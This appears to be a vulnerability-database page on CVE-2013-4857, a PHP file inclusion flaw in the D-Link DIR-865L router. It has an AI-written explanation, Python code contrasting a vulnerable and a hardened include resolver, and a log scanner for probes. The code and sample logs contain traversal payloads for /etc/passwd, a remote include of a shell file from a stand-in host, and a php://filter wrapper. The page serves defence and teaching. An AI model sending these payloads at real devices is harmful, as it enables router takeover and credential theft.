VYPR
Unrated severity · NVD Advisory · Published Oct 25, 2019 · Updated Aug 6, 2024

CVE-2013-4857


Description

D-Link DIR-865L has PHP File Inclusion in the router xml file.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The D-Link DIR-865L router contains a PHP file inclusion vulnerability in the handling of its router XML file. A flaw of this class lets an attacker make the web server include, and therefore execute, a PHP file of the attacker's choosing. The one-line NVD description states neither the authentication requirement nor the affected firmware versions; the narrative below marks where it goes beyond the description.

Vulnerability

CVE-2013-4857 describes a PHP file inclusion vulnerability in the D-Link DIR-865L router. The NVD description locates the flaw in the router XML file and says nothing more. In a PHP file inclusion flaw of this class, a value taken from the request is passed to include or require without validation, so an attacker can point it at a different local file (walking out of the intended directory with "../" segments) or, if the interpreter permits remote includes, at a URL, and the server includes and executes whatever it finds there. The description does not state whether the vulnerable page requires authentication, nor which firmware versions are affected; in the absence of a vendor fix, every DIR-865L firmware release should be treated as potentially affected. [1]

Exploitation

Exploiting a flaw of this class means sending a crafted HTTP request to the page that performs the include (here, the router XML file processing endpoint) with the controlled parameter set to the path of a local file the web server process can read or, when the interpreter's allow_url_include setting is on, to a URL under the attacker's control. The exposure is the router's web interface, reachable from the LAN and, if remote management is enabled, from the WAN. The description does not say whether the endpoint is reachable without authentication, so the unauthenticated case should be assumed until a reference rules it out. No user interaction is involved: the request alone triggers the include. [1]
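A model of the bug class described above, as an added example that is not the DIR-865L firmware code (the CVE description reproduces none of it): the parameter name, the include directory and the allowlist are assumptions chosen for illustration. vulnerable_resolve returns the target that an unvalidated PHP-style include of a request value would try to load, covering traversal, remote URLs and stream wrappers; hardened_resolve shows the allowlist-plus-canonical-path check that closes the hole.

```python
"""Model of a PHP-style file inclusion flaw and of a hardened resolver.

Added example: this is not the DIR-865L firmware (which the CVE description
does not reproduce).  INCLUDE_DIR, the ALLOWED map and the idea that the
request value is named `file` are assumptions chosen for illustration.
"""
import posixpath
from urllib.parse import urlsplit

INCLUDE_DIR = "/var/www/inc"        # assumed directory holding the legitimate includes
REMOTE_SCHEMES = ("http", "https", "ftp")
WRAPPER_SCHEMES = ("php", "data", "expect", "phar", "zip")


def vulnerable_resolve(param: str, allow_url_include: bool = False) -> str:
    """Mimic `include $_GET['file'];` with no validation.

    Returns the target the interpreter would try to load.  A remote URL is
    only followed when allow_url_include is On (it is Off by default since
    PHP 5.2); a relative path resolves against INCLUDE_DIR (standing in for
    the script's working directory) and is taken as-is, so '../' segments
    walk out of it to any file the web server process can read.
    """
    scheme = urlsplit(param).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        if not allow_url_include:
            raise PermissionError("remote include blocked: allow_url_include=Off")
        return param                       # remote file would be fetched and executed
    if scheme in WRAPPER_SCHEMES:
        return param                       # php://filter, data://, ... passed straight through
    # normpath collapses '..' exactly as the filesystem would
    return posixpath.normpath(posixpath.join(INCLUDE_DIR, param))


# Assumed allowlist: request key -> file the page is actually meant to include
ALLOWED = {"status": "status.php", "wireless": "wireless.php", "wan": "wan.php"}


def hardened_resolve(param: str) -> str:
    """Map the request value through a fixed allowlist, then verify the
    canonical result still lies inside INCLUDE_DIR.  Everything else,
    including URLs, wrappers and traversal strings, is rejected."""
    try:
        target = posixpath.normpath(posixpath.join(INCLUDE_DIR, ALLOWED[param]))
    except KeyError:
        raise ValueError(f"rejected include key: {param!r}") from None
    if posixpath.commonpath([target, INCLUDE_DIR]) != INCLUDE_DIR:
        raise ValueError("resolved path escapes the include directory")
    return target


def attempt(resolver, param: str, **kwargs):
    """Run a resolver and report ('ok', target) or ('rejected', reason)."""
    try:
        return ("ok", resolver(param, **kwargs))
    except (PermissionError, ValueError) as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    probes = [
        "wireless",
        "../../../etc/passwd",
        "http://evil.example/shell.txt",
        "php://filter/convert.base64-encode/resource=index.php",
    ]
    for probe in probes:
        print(f"{probe!r:60} vulnerable -> {attempt(vulnerable_resolve, probe, allow_url_include=True)}")
        print(f"{'':60} hardened   -> {attempt(hardened_resolve, probe)}")
```

The second check in hardened_resolve looks redundant once an allowlist is in place, and it is; it stays because allowlists get edited, and a later entry such as "../../tmp/x.php" would otherwise silently reopen the traversal path.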

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the router with the privileges of the web server process. The description does not state that privilege level; on embedded routers the web server commonly runs as root, in which case the attacker controls the whole device. Even a read-only inclusion (for example, pulling configuration files through traversal) exposes stored credentials. Code execution on the router allows the attacker to alter its configuration, intercept, modify or redirect network traffic, and pivot to devices on the internal network. The realistic impact is complete loss of confidentiality, integrity and availability of the router and potentially of the local network behind it. [1]

Mitigation

The references indexed on this page record no official D-Link fix for this issue, and the DIR-865L is no longer a current product. Users should disable remote (WAN-side) management, restrict access to the router's web interface to trusted hosts on the local network, rotate any credentials stored on the device if exposure is suspected, and replace the device if it is no longer receiving vendor firmware. On the network side, requests to the router's web interface whose parameters carry a URL scheme, a PHP stream wrapper or "../" segments are a reliable indicator that someone is probing for this class of flaw. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog as of this writing. [1]
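Detection logic for the probing pattern mentioned above, as an added example that is not part of the original advisory: the access-log lines are constructed, not captured from a DIR-865L, and the endpoint name router.xml and the parameter name file are assumptions, since the CVE description names only "the router xml file". The scanner parses each request, decodes the query parameters (twice, to catch double-encoded traversal) and tags values that carry a remote URL, a PHP stream wrapper, traversal segments or a NUL byte.

```python
"""Scan web-server access logs for PHP file inclusion probes.

Added example, not part of the advisory.  SAMPLE_LOG is constructed for
illustration; the endpoint /router.xml and the parameter `file` are
assumptions, as the CVE description names only 'the router xml file'.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: client, ident, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of a file-inclusion payload in a single parameter value
INDICATORS = [
    ("remote-url", re.compile(r"^(https?|ftp)://", re.I)),
    ("stream-wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.I)),
    ("traversal", re.compile(r"(^|/)\.\.(/|$)")),
    ("null-byte", re.compile(r"\x00")),
]


def classify_value(value: str):
    """Return the indicator names that match a (once-decoded) parameter value.
    A second unquote defeats double encoding such as %252e%252e%252f."""
    decoded = unquote(value)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(lines):
    """Parse log lines and return one hit per suspicious query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not a request line we understand
        parts = urlsplit(m["target"])
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                hits.append({
                    "ip": m["ip"], "ts": m["ts"], "path": parts.path,
                    "param": key, "value": value, "tags": tags,
                    "status": int(m["status"]),
                })
    return hits


# Constructed sample: one benign request, four probes, one unrelated POST
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Oct/2019:10:00:01 +0000] "GET /router.xml?file=status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Oct/2019:10:00:05 +0000] "GET /router.xml?file=../../../../etc/passwd HTTP/1.1" 200 1337 "-" "curl/7.64.0"',
    '198.51.100.7 - - [25/Oct/2019:10:00:09 +0000] "GET /router.xml?file=http://203.0.113.5/shell.txt HTTP/1.1" 200 88 "-" "curl/7.64.0"',
    '198.51.100.7 - - [25/Oct/2019:10:00:12 +0000] "GET /router.xml?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "curl/7.64.0"',
    '203.0.113.77 - - [25/Oct/2019:10:01:00 +0000] "GET /router.xml?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "python-requests/2.22"',
    '192.0.2.11 - - [25/Oct/2019:10:02:00 +0000] "POST /login.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:15} {hit['path']} {hit['param']}={hit['value']!r} -> {hit['tags']} (HTTP {hit['status']})")
```

A 200 response to a traversal or wrapper probe is the line to escalate on; a 404 only tells you the attacker is scanning. The indicator list deliberately ignores backslash traversal, which does not apply to a Linux-based router.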

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References: 2

News mentions: 0

No linked articles in our index yet.